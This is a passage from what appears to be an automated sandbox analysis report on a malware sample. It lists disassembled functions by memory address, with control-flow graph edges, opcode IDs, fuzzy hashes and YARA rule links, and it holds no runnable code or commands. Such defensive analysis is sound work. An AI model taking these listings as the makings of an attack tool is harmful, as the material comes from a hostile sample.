                                                                                                                                  control_flow_graph 1055 7ffd9bec18b8-7ffd9bec18d0 1057 7ffd9bec18d8-7ffd9bec1903 1055->1057 1061 7ffd9bec192c-7ffd9bec1932 1057->1061 1062 7ffd9bec1939-7ffd9bec193f 1061->1062 1063 7ffd9bec1905-7ffd9bec191e 1062->1063 1064 7ffd9bec1941-7ffd9bec1946 1062->1064 1065 7ffd9bec1a15-7ffd9bec1a25 1063->1065 1066 7ffd9bec1924-7ffd9bec1929 1063->1066 1067 7ffd9bec194c-7ffd9bec1981 1064->1067 1068 7ffd9bec1833-7ffd9bec1878 1064->1068 1073 7ffd9bec1a28-7ffd9bec1a3a 1065->1073 1074 7ffd9bec1a27 1065->1074 1066->1061 1068->1062 1072 7ffd9bec187e-7ffd9bec1884 1068->1072 1075 7ffd9bec1886 1072->1075 1076 7ffd9bec1835-7ffd9bec1a0d 1072->1076 1074->1073 1079 7ffd9bec18af-7ffd9bec18b6 1075->1079 1076->1065 1079->1055 1080 7ffd9bec1888-7ffd9bec18a1 1079->1080 1080->1065 1082 7ffd9bec18a7-7ffd9bec18ac 1080->1082 1082->1079
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                  • Opcode ID: 51beba9f4f5c3ffd8cc2ebe7b18bfeec93150df7908c37f684925bea3218dbe9
                                                                                                                                  • Instruction ID: 9a1e0f8ac19fffb6130104c3030d185d23ab06232ca3e7ff49d3fe6f97ae788c
                                                                                                                                  • Opcode Fuzzy Hash: 51beba9f4f5c3ffd8cc2ebe7b18bfeec93150df7908c37f684925bea3218dbe9
                                                                                                                                  • Instruction Fuzzy Hash: 0C415A31E0964E8FDB19DBD4C4A15BDB7B5FF59304F5140BDD01AA72A2CA3A6A01CB01
                                                                                                                                  Function 00007FFD9BAF6539 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1091 7ffd9baf6539-7ffd9baf654d 1092 7ffd9baf654f-7ffd9baf656a 1091->1092 1093 7ffd9baf656e-7ffd9baf6573 1092->1093
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: M
                                                                                                                                  • API String ID: 0-3664761504
                                                                                                                                  • Opcode ID: 518ecb38569b4e476c97c719ac4fc140f910f842c5b58df333cb9878de6109df
                                                                                                                                  • Instruction ID: 239180676a0f6c871bed2ff05dd258ea8ab98205651b267fc3ec3e264b8d8964
                                                                                                                                  • Opcode Fuzzy Hash: 518ecb38569b4e476c97c719ac4fc140f910f842c5b58df333cb9878de6109df
                                                                                                                                  • Instruction Fuzzy Hash: 94E0E52060B7844FCB15AA3884684407FA0EF6720074A42EEC045CB1A7EA1CC886C701
                                                                                                                                  Function 00007FFD9BAF9329 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: f1c88c8fa128a86207a4676cb8e29d6effd8362e948116f8eda037dd0a124774
                                                                                                                                  • Instruction ID: 65128efe201d6055e6aa624ab1b4f71118643a39a5c9caa4d39f1d958284023a
                                                                                                                                  • Opcode Fuzzy Hash: f1c88c8fa128a86207a4676cb8e29d6effd8362e948116f8eda037dd0a124774
                                                                                                                                  • Instruction Fuzzy Hash: 7BE04F7154E3C44FCB1AEB7488698543F609E6B21078B40EEC545CF1B3E62DC949C701
                                                                                                                                  Function 00007FFD9BAF94D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: I
                                                                                                                                  • API String ID: 0-3707901625
                                                                                                                                  • Opcode ID: 8c6a4fdce00041ebd4391893b12501e3b221cfcef03c37ec6b9b962d6311d25f
                                                                                                                                  • Instruction ID: 18810488a757b8b08116a3e883db7c51dd8dc65599a559135fcde6d5b3d4ed7d
                                                                                                                                  • Opcode Fuzzy Hash: 8c6a4fdce00041ebd4391893b12501e3b221cfcef03c37ec6b9b962d6311d25f
                                                                                                                                  • Instruction Fuzzy Hash: C0E0E56194E7C44FCB16EB7588AA9547FA0AE6721178A40EEC189CB1B3E6298949C701
                                                                                                                                  Function 00007FFD9BAE0F40 Relevance: .8, Instructions: 787COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bae0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 06daad4cb8988aa83c5b4c45b5b73a8b53f9b62350327b846b06686734faf8e7
                                                                                                                                  • Instruction ID: e2e8082c7022280ab2cdec3724852e3b9139526a779f4d7e816ccd86aa2d400a
                                                                                                                                  • Opcode Fuzzy Hash: 06daad4cb8988aa83c5b4c45b5b73a8b53f9b62350327b846b06686734faf8e7
                                                                                                                                  • Instruction Fuzzy Hash: AB42C031B0991E4FEBA8EB5884A17B473D2FFA8350F0542B9D44DC72D7DE68AD428781
                                                                                                                                  Function 00007FFD9BEC1B2F Relevance: .4, Instructions: 422COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 24f04288fc8015acc17a152d4ac12979c64d73400c9be5141d2c81da7ff1f9c1
                                                                                                                                  • Instruction ID: 6723d7562eaa649bb1706c3519f0d8f104bd8cddc7b709e642cfb3eb826c59b8
                                                                                                                                  • Opcode Fuzzy Hash: 24f04288fc8015acc17a152d4ac12979c64d73400c9be5141d2c81da7ff1f9c1
                                                                                                                                  • Instruction Fuzzy Hash: 10F1E23061964A8FEB59DF58C4E06B43BA5FF45300F5145BDD84ACB29BCB39E981CB82
                                                                                                                                  Function 00007FFD9BEC1B4F Relevance: .3, Instructions: 337COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 08e841edde9646f31f9488f28829bdf3c87c132b10ec0eedccd0f1f485d25957
                                                                                                                                  • Instruction ID: 3b73947f87973cb77984bd96ae6ec00627620609d1e056d0993fc1f0f487b35a
                                                                                                                                  • Opcode Fuzzy Hash: 08e841edde9646f31f9488f28829bdf3c87c132b10ec0eedccd0f1f485d25957
                                                                                                                                  • Instruction Fuzzy Hash: F5C1C03061A64A8FEB1DDF58C0E05B037A5FF45300B5545BDD88ACB69BCB39E981CB82
                                                                                                                                  Function 00007FFD9BEC3DF7 Relevance: .3, Instructions: 306COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 68610f96cd95bb7652b9b9b75b0d61692386f12f51a3ad652dd8360895ee68b1
                                                                                                                                  • Instruction ID: 9cd828cf177df10d19fa6d9a28331cad2f9f97793f48b60949b3963c81f33e6d
                                                                                                                                  • Opcode Fuzzy Hash: 68610f96cd95bb7652b9b9b75b0d61692386f12f51a3ad652dd8360895ee68b1
                                                                                                                                  • Instruction Fuzzy Hash: 1921E112F8F29E47F6B571A418330FC16685F45225F0A06BED85F8A1E3CC4E2A856283
                                                                                                                                  Function 00007FFD9BEC144F Relevance: .3, Instructions: 293COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 32f9fc47f699591979ca9f7c4ca043e3d76b681b60e9ee1d28246327f74dbe42
                                                                                                                                  • Instruction ID: c1c699d6d845d61fda197d7dc0b58cfc0279a845865ee098bd286ea662874cb7
                                                                                                                                  • Opcode Fuzzy Hash: 32f9fc47f699591979ca9f7c4ca043e3d76b681b60e9ee1d28246327f74dbe42
                                                                                                                                  • Instruction Fuzzy Hash: D0A11930A0EA4A8FE759EB68C0B06B4B7A4FF15300F5541BDD04EC7A96CB29F951CB81
                                                                                                                                  Function 00007FFD9BEC648A Relevance: .3, Instructions: 290COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 889a61b37aaa0fb3e0dc87cf4ec4a4c56477e9ca2f4896c538489db32721d578
                                                                                                                                  • Instruction ID: c24db1f7c4727ad0d3a071cbde5fae427673a9b150fe765e39f6b59bdb028110
                                                                                                                                  • Opcode Fuzzy Hash: 889a61b37aaa0fb3e0dc87cf4ec4a4c56477e9ca2f4896c538489db32721d578
                                                                                                                                  • Instruction Fuzzy Hash: A6A13730A0EA4A8FE759EF64C0A15B5B7A0FF25300F5541B9C04ECBAD7DB29B951C790
                                                                                                                                  Function 00007FFD9BEC597C Relevance: .3, Instructions: 256COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: af54bb15baf81e9082d8f7c234ba4d79f67722146ee8fc6cb7dbf68e15ffb092
                                                                                                                                  • Instruction ID: f40071be12816284a24e93efb7e1158d2da325fb19238ade78560f46faa20b4c
                                                                                                                                  • Opcode Fuzzy Hash: af54bb15baf81e9082d8f7c234ba4d79f67722146ee8fc6cb7dbf68e15ffb092
                                                                                                                                  • Instruction Fuzzy Hash: 48715D31B1EB4A8FE378AB6894621797BE4FF85310B16057FD08FC7192DE2A75028741
                                                                                                                                  Function 00007FFD9BEC092C Relevance: .3, Instructions: 256COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 622f44c3ce4d8e3db37779c6d878fe3bd988e380324e3629bb3e10659d1dcd38
                                                                                                                                  • Instruction ID: f3f6ac2afe9d66bc6216779851516db29551cbf9056cd733d9d3825abf7004c7
                                                                                                                                  • Opcode Fuzzy Hash: 622f44c3ce4d8e3db37779c6d878fe3bd988e380324e3629bb3e10659d1dcd38
                                                                                                                                  • Instruction Fuzzy Hash: 5B717B31B0EB0A8FE378AAA8846157577E9EF85714F11057ED48FC71A3DE2ABD028701
                                                                                                                                  Function 00007FFD9BEC3AA9 Relevance: .2, Instructions: 244COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6dfe5b8ff2b9b7308253d67e44de8e69c32609559ab079e6d58a9dc3eff4f1a8
                                                                                                                                  • Instruction ID: c46a77067c571719c455a5a397108a3c96b1d2d62480d35f98c06ac4704b7df3
                                                                                                                                  • Opcode Fuzzy Hash: 6dfe5b8ff2b9b7308253d67e44de8e69c32609559ab079e6d58a9dc3eff4f1a8
                                                                                                                                  • Instruction Fuzzy Hash: 36715835B0E94D4FE779FA5884275B837D4EF48311B1202B9D09EC75B2DE3AAE068781
                                                                                                                                  Function 00007FFD9BAF9573 Relevance: .2, Instructions: 202COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 72e8026ec3e2de616ee7a9e3b76b599a94eb9e03d338995f3de0f0a7fe4fb924
                                                                                                                                  • Instruction ID: 197accf6c697d0216c3c1d26c7ee4bcbd70ef91f7b68e66805ef50ebb64f4c40
                                                                                                                                  • Opcode Fuzzy Hash: 72e8026ec3e2de616ee7a9e3b76b599a94eb9e03d338995f3de0f0a7fe4fb924
                                                                                                                                  • Instruction Fuzzy Hash: 6761C430B09A0E4FEB68EB69C469AE97BA1FF98314F510179D01DC7296DF28E9418740
                                                                                                                                  Function 00007FFD9BEC2B71 Relevance: .2, Instructions: 196COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e34fac2abd6b35113ccae6b1ea74dd07c907c83ed03a3ef16866e6d4ab1840d6
                                                                                                                                  • Instruction ID: ccf17df45374a1f38d9af1765f485c480f7948749122beffb817d8dec80b80f0
                                                                                                                                  • Opcode Fuzzy Hash: e34fac2abd6b35113ccae6b1ea74dd07c907c83ed03a3ef16866e6d4ab1840d6
                                                                                                                                  • Instruction Fuzzy Hash: E371F730A0AB0A8FE369EBA4C1A157177E5FF55300B51497DC49EC7AA6CB3AF841C741
                                                                                                                                  Function 00007FFD9BEC7BC1 Relevance: .2, Instructions: 194COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6c482795b88f4b2aaaa69ded681b41686f4f4c76cb89ac2e828fb4cc9ac725e5
                                                                                                                                  • Instruction ID: 6eb2fb83d891bbe2984d14fd51fbc7271b51251183436d1d6100486e6ca03007
                                                                                                                                  • Opcode Fuzzy Hash: 6c482795b88f4b2aaaa69ded681b41686f4f4c76cb89ac2e828fb4cc9ac725e5
                                                                                                                                  • Instruction Fuzzy Hash: B361A03060AB4A8FD3B9EF64C1A15717BA1FF55310F51497DC49AC7AA2CA2AB842CB44
                                                                                                                                  Function 00007FFD9BECD87C Relevance: .2, Instructions: 174COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 45180460842592284613e937f92f25fe1ab9306b5790293a37c226fa8cc80497
                                                                                                                                  • Instruction ID: 983bafe26fe8c73e2e9f2cd109dc6d24fd1c8a136c1673e6770affb659617631
                                                                                                                                  • Opcode Fuzzy Hash: 45180460842592284613e937f92f25fe1ab9306b5790293a37c226fa8cc80497
                                                                                                                                  • Instruction Fuzzy Hash: 2751EC66E1F68E0BE776BA940C231F43BD4DF45311F0641BAD48D871B3DD5B261A4392
                                                                                                                                  Function 00007FFD9BAD08D0 Relevance: .2, Instructions: 153COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bad0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6e00b51fce6d0add9ef3e7eea6e7c140260376d5dee79c7fe7f2c8fab12ff5b1
                                                                                                                                  • Instruction ID: 0701bfce2b4798fa7285e9d3a21f0fbf1c47b5591e40544d79ffa1116cca48b0
                                                                                                                                  • Opcode Fuzzy Hash: 6e00b51fce6d0add9ef3e7eea6e7c140260376d5dee79c7fe7f2c8fab12ff5b1
                                                                                                                                  • Instruction Fuzzy Hash: 91412C11B0C5590AE329F7AC64B66F97781DF9833AB4447BBE40ECB1EBDD149841C285
                                                                                                                                  Function 00007FFD9BEC6D8F Relevance: .2, Instructions: 153COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2be9d19fa97b8d3b9b563f142f864bf9086d67811576ef9dde321cf5d2ea5dc6
                                                                                                                                  • Instruction ID: d3a78bdf6312f16a2a138740e01e277ad7268281d4fb59403b158450ab1a4d45
                                                                                                                                  • Opcode Fuzzy Hash: 2be9d19fa97b8d3b9b563f142f864bf9086d67811576ef9dde321cf5d2ea5dc6
                                                                                                                                  • Instruction Fuzzy Hash: 8D51183061A6558FEB99DF18C0E06B03BA4FF55310B9451FEC84ACB69BC739E982CB40
                                                                                                                                  Function 00007FFD9BAF959C Relevance: .2, Instructions: 151COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2949988761.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9baf3000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1a99aa45ab2ab51ce3803f587806cd0b16a2575fd945309e0c628e0e447161f5
                                                                                                                                  • Instruction ID: 1186daa53447c3d8bc8e38287f88604cc3ed49ec6cefe11004bc256d905422dd
                                                                                                                                  • Opcode Fuzzy Hash: 1a99aa45ab2ab51ce3803f587806cd0b16a2575fd945309e0c628e0e447161f5
                                                                                                                                  • Instruction Fuzzy Hash: A1515130B1891E8FDB98EB59C4A4AA977E2FFA8314F514579D01DC7696CB38E841CB40
                                                                                                                                  Function 00007FFD9BEC3197 Relevance: .1, Instructions: 127COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 58577146d7014d28247004e5630cf7b338445d468b1cbd4b43399979a0ff099b
                                                                                                                                  • Instruction ID: fbe46e875e8bf903aa08d48b62ff01407e3337f88d5b9503d138651b08b832c0
                                                                                                                                  • Opcode Fuzzy Hash: 58577146d7014d28247004e5630cf7b338445d468b1cbd4b43399979a0ff099b
                                                                                                                                  • Instruction Fuzzy Hash: 9D41623260D9098FDF9CEF18C465EA5B7E1FFA8320B0505AAD44EC7296DE35E845CB81
                                                                                                                                  Function 00007FFD9BEC81E7 Relevance: .1, Instructions: 126COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a64c25d276698c2dc8bd449322524781336bd85218b201980f03013455ed3454
                                                                                                                                  • Instruction ID: 01f4d776d064bb4ecda4d15d00894a05744c5191fbbad85f3991c6b36ba380a9
                                                                                                                                  • Opcode Fuzzy Hash: a64c25d276698c2dc8bd449322524781336bd85218b201980f03013455ed3454
                                                                                                                                  • Instruction Fuzzy Hash: 64413E3160D90D8FDB9CEF18C4A9DB4B3E1FF69321B0545AAD44AC7692DE21F845CB81
                                                                                                                                  Function 00007FFD9BEC8291 Relevance: .1, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0cc3903cb3404a4a70ade0c785a62b686ef6a3b230946271650db8aa52e8256e
                                                                                                                                  • Instruction ID: 57646a1ebd3145cf197e0652405e391ae3f852a4801649b150599e9f91c89e6d
                                                                                                                                  • Opcode Fuzzy Hash: 0cc3903cb3404a4a70ade0c785a62b686ef6a3b230946271650db8aa52e8256e
                                                                                                                                  • Instruction Fuzzy Hash: 8631A23160CD088FDB5CEF18C4A9DB4B3E1FF6931070506AAD45AC76A2DE21F845CB81
                                                                                                                                  Function 00007FFD9BEC3241 Relevance: .1, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000015.00000002.2957345490.00007FFD9BEC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BEC0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_21_2_7ffd9bec0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 57199c0cbb90bbde0bc90c32165ae9efebe88c8696d91e43ef850003c1197c57
                                                                                                                                  • Instruction ID: 1ef02539af20f3f8ab40c92db6646b0c95b65a2462c568dbe355ae88d045a62f
                                                                                                                                  • Opcode Fuzzy Hash: 57199c0cbb90bbde0bc90c32165ae9efebe88c8696d91e43ef850003c1197c57
                                                                                                                                  • Instruction Fuzzy Hash: AC31923260C9488FDF5CEF28C465EA477E1FFA9310B0406AAD48EC7296DE35E840CB81
                                                                                                                                  Function 00007FFD9BEC822B Relevance: .1, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
